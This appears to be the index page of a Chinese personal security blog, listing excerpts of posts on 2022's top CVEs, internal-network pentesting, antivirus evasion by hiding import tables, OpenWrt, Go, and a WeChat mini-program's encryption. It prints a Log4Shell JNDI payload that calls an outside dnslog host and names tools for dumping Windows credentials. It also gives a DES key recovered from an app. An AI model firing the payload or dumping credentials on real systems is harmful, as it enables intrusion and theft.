nali数据库分享 正文 链接:https://wwi.lanzoup.com/iDva60maofkh 在新机器上用scoop装nali,发现域名解析失败了: 用我上面的文件保存在如下路径C:\{user},即可h 2023-02-01 #nali
2022 top 10漏洞 前言 发现top10居然有好几个我没遇到过,这不得记录一下。 exp CVE-2021-44228 log4j远程代码执行 基础payload:${jndi:ldap://ky28eo.dnslog.cn} CVE-2022-30190 看了下复现的文章,这是一个office的远程代码执行漏洞,poc见:https://github.com/JohnHammond/msdt-follina CVE 2023-01-28 #exp
openwrt相关 前言 生命不息,折腾不止,从斐讯k1到x86,感谢openwrt开发者的无私贡献。 常用固件 https://github.com/kiddin9/OpenWrt_x86-r2s-r4s-r5s-N1、 https://openwrt.org/zh/downloads 常用网站 https://www.right.com.cn/forum/portal.php 刷写 注意,要不你放/tmp 2023-01-18 #openwrt #路由器
值得一看的网站 https://3gstudent.github.io/ https://www.somedoc.net/ https://xz.aliyun.com/ https://tttang.com/ https://i.hacking8.com/ https://bbs.kanxue.com/ https://www.52pojie.cn/ https://www.anquanke.com/ http 2023-01-18 #something
内网渗透记录 前言 随着在大型比赛中内网越来越重要,打内网的机会越来越多,在此记录一些常用的内网渗透技巧/命令/工具,省的每次用都要去搜,机会是留给有准备的人的,你准备的越充分,机会到来的时候,你就越不会慌张。 正文 在Windows环境中抓密码 工具 搞安全谁不知道这个工具mimikatz 微软官方的工具,带数字签名,有一定的免杀效果但不多procdump SqlDumper,默认存放在C:FilesSQL 2023-01-18 #内网渗透 #渗透测试
c和c++相关笔记 前言 多线程卷起来,要把理论落实到实践中去,一点点积累起来逆向的基础,一点点学习和杀软对抗,迟早有一天我也能成为re大佬。这篇文章主要记录一下学习隐藏导入表的学习记录。 正文 c编译环境搭建 下载MinGW并将bin目录加入环境变量; 下载vscode 下载visualstudio 环境搭建到此为止 学习笔记 隐藏User32.dll导入表 隐藏前的源码 123456789#include&l 2023-01-16 #c #c++ #代码
golang学习笔记 前言 随着golang越来越火,终于下定决心系统学一下golang,本身有一点Java/Python/PHP基础,以为只要学一下golang的语法就可以愉快的开发了,实际操作发现不是这样,本篇文章主要记录学习golang过程中遇到的坑。 正文 编译 Windows 下编译 Mac 和 Linux 64位可执行程序 123456789SET CGO_ENABLED=0SET GOOS=darwinS 2023-01-12 #开发 #golang
windows杂项 前言 本片文章主要记录一些奇奇怪怪的东西,不定期更新 正文 查看系统配置 1neofetch powershell命令历史文件位置,文件名ConsoleHost_history.txt 1cd %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine powershell 配置文件路径 1"D:\User 2023-01-11 #杂项
记一次寻找微信小程序通信加密方法的过程 前言 在测试微信小程序的过程中,发现通信的数据存在加密,如何在Windows使用burpsuite进行抓包可以参考我之前的文章,在对小程序进行反编译寻找加密方法和加密过程中,也发现了一些有意思的事,故此记录一下,如何对小程序进行反编译可以参考我之前的文章。 过程 直接在vscode里面搜索crypt,可以发现如下的几个加密函数: 加密方法des-ecb-pkcs7,密钥:t2b4h6y4l5 第 2023-01-10 #加密 #微信小程序